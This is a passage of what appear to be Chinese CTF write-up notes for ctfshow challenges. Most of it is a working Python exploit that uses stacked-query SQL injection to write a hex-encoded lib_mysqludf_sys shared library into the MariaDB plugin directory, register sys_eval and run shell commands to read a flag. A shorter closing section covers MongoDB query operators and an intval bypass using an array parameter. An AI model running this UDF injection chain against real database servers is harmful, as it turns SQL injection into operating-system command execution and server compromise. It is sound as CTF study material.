000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00900000000000000000000000000000000000003000B00800A00000000000000000000000000000000000003000C00481100000000000000000000000000000000000003000D00581100000000000000000000000000000000000003000E00441200000000000000000000000000000000000003000F00C81200000000000000000000000000000000000003001000C81420000000000000000000000000000000000003001100D81420000000000000000000000000000000000003001200E81420000000000000000000000000000000000003001300F01420000000000000000000000000000000000003001400F81420000000000000000000000000000000000003001500781620000000000000000000000000000000000003001600901620000000000000000000000000000000000003001700101720000000000000000000000000000000000003001800000000000000000000000000000000000100000002000B00800A0000000000000000000000000000110000000400F1FF000000000000000000000000000000001C00000001001000C81420000000000000000000000000002A00000001001100D81420000000000000000000000000003800000001001200E81420000000000000000000000000004500000002000B00A00A00000000000000000000000000005B00000001001700101720000000000001000000000000006A00000001001700181720000000000008000000000000007800000002000B00200B0000000000000000000000000000110000000400F1FF000000000000000000000000000000008400000001001000D01420000000000000000000000000009100000001000F00C01400000000000000000000000000009F00000001001200E8142000000000000000000000000000AB00000002000B0010110000000000000000000000000000C10000000400F1FF00000000000000000000000000000000D40000000100F1FF90162000000000000000000000000000EA00000001001300F0142000000000000000000000000000F700000001001100E0142000000000000000000000000000040100000100F1FFF81420000000000000000000000000000D01000012000B00D10D000000000000D1000000000000001501000012000B00130F0000000000002F000000000000001E01000020000000000000000000000000000000000000002D01000020000000000000000000000000000000000000004101000012000C00481100000000000000000000000000004701000012000B00A90F0000000000000A000000000000005701000012000000000000000000000000000000000000006B01000012000000000000000000000000000000000000007F01000012000B00A20E00000000000067000000000000008D01000012000B00B30F0000000000005501000000000000960100001200000000000000000000000000000000000000A901000012000B00950B0000000000000A00000000000000C601000012000B00B50C000000000000F100000000000000D30100001200000000000000000000000000000000000000E50100001200000000000000000000000000000000000000F901000012000000000000000000000000000000000000000D02000012000B004C0B00000000000049000000000000002802000022000000000000000000000000000000000000004402000012000B00A60D0000000000002B000000000000005302000012000B00EB0B0000000000005D000000000000006002000012000B00480C0000000000000A000000000000006F02000012000000000000000000000000000000000000008302000012000B00420F0000000000006700000000000000910200001200000000000000000000000000000000000000A50200001200000000000000000000000000000000000000B902000012000B00520C0000000000006300000000000000C10200001000F1FF10172000000000000000000000000000CD02000012000B009F0B0000000000004C00000000000000E30200001000F1FF20172000000000000000000000000000E80200001200000000000000000000000000000000000000FD02000012000B00090F0000000000000A000000000000000D0300001200000000000000000000000000000000000000220300001000F1FF101720000000000000000000000000002903000012000000000000000000000000000000000000003C03000012000900880900000000000000000000000000000063616C6C5F676D6F6E5F73746172740063727473747566662E63005F5F43544F525F4C4953545F5F005F5F44544F525F4C4953545F5F005F5F4A43525F4C4953545F5F005F5F646F5F676C6F62616C5F64746F72735F61757800636F6D706C657465642E363335320064746F725F6964782E36333534006672616D655F64756D6D79005F5F43544F525F454E445F5F005F5F4652414D455F454E445F5F005F5F4A43525F454E445F5F005F5F646F5F676C6F62616C5F63746F72735F617578006C69625F6D7973716C7564665F7379732E63005F474C4F42414C5F4F46465345545F5441424C455F005F5F64736F5F68616E646C65005F5F44544F525F454E445F5F005F44594E414D4943007379735F736574007379735F65786563005F5F676D6F6E5F73746172745F5F005F4A765F5265676973746572436C6173736573005F66696E69007379735F6576616C5F6465696E6974006D616C6C6F634040474C4942435F322E322E350073797374656D4040474C4942435F322E322E35007379735F657865635F696E6974007379735F6576616C0066676574734040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F7365745F696E697400667265654040474C4942435F322E322E35007374726C656E4040474C4942435F322E322E350070636C6F73654040474C4942435F322E322E35006C69625F6D7973716C7564665F7379735F696E666F5F696E6974005F5F6378615F66696E616C697A654040474C4942435F322E322E35007379735F7365745F6465696E6974007379735F6765745F696E6974007379735F6765745F6465696E6974006D656D6370794040474C4942435F322E322E35007379735F6576616C5F696E697400736574656E764040474C4942435F322E322E3500676574656E764040474C4942435F322E322E35007379735F676574005F5F6273735F7374617274006C69625F6D7973716C7564665F7379735F696E666F005F656E64007374726E6370794040474C4942435F322E322E35007379735F657865635F6465696E6974007265616C6C6F634040474C4942435F322E322E35005F656461746100706F70656E4040474C4942435F322E322E35005F696E697400 '
codes = []
for i in range(0, len(code), 128):
    codes.append(code[i:min(i + 128, len(code))])


def commit_payload(payload: str):
    requests.get(url + f'''0';{payload};-- A''')


# 第一次运行建临时表
# sql='''create table temp(data longblob)'''


# 清空临时表
commit_payload('''delete from temp''')

# 插入第一段数据
commit_payload('''insert into temp(data) values (0x{})'''.format(codes[0]))

# 更新连接剩余数据
for k in range(1, len(codes)):
    commit_payload('''update temp set data = concat(data,0x{})'''.format(codes[k]))

# 10.3.18-MariaDB
# 写入so文件
commit_payload('''select data from temp into dumpfile '/usr/lib/mariadb/plugin/udf.so\'''')

# 引入自定义函数
commit_payload('''create function sys_eval returns string soname 'udf.so\'''')

# 命令执行，结果更新到界面
commit_payload(
    '''update ctfshow_user set pass=(select sys_eval('cat /flag.????'))''')

# 查看结果
r = requests.get(url[:-4] + '?page=1&limit=10')
print(r.text)

249

$gt : >
$lt : <
$gte: >=
$lte: <=
$ne : !=、<>
$in : in
$nin: not in
$all: all 
$or:or
$not: 反匹配(1.3.3及以上版本)
模糊查询用正则式：db.customer.find({'name': {'$regex':'.*s.*'} })
/**
* : 范围查询 { "age" : { "$gte" : 2 , "$lte" : 21}}
* : $ne { "age" : { "$ne" : 23}}
* : $lt { "age" : { "$lt" : 23}}
*/

//查询age = 22的记录
db.userInfo.find({"age": 22});
//相当于：select * from userInfo where age = 22;
//查询age > 22的记录
db.userInfo.find({age: {$gt: 22}});
//相当于：select * from userInfo where age > 22;

这题的话提示了flag在flag中，相当于找flag的值，正常肯定是id=flag，但是会返回error。
对于非空的数组，intval会返回1，应该可以绕过intval的检验：?id[]=flag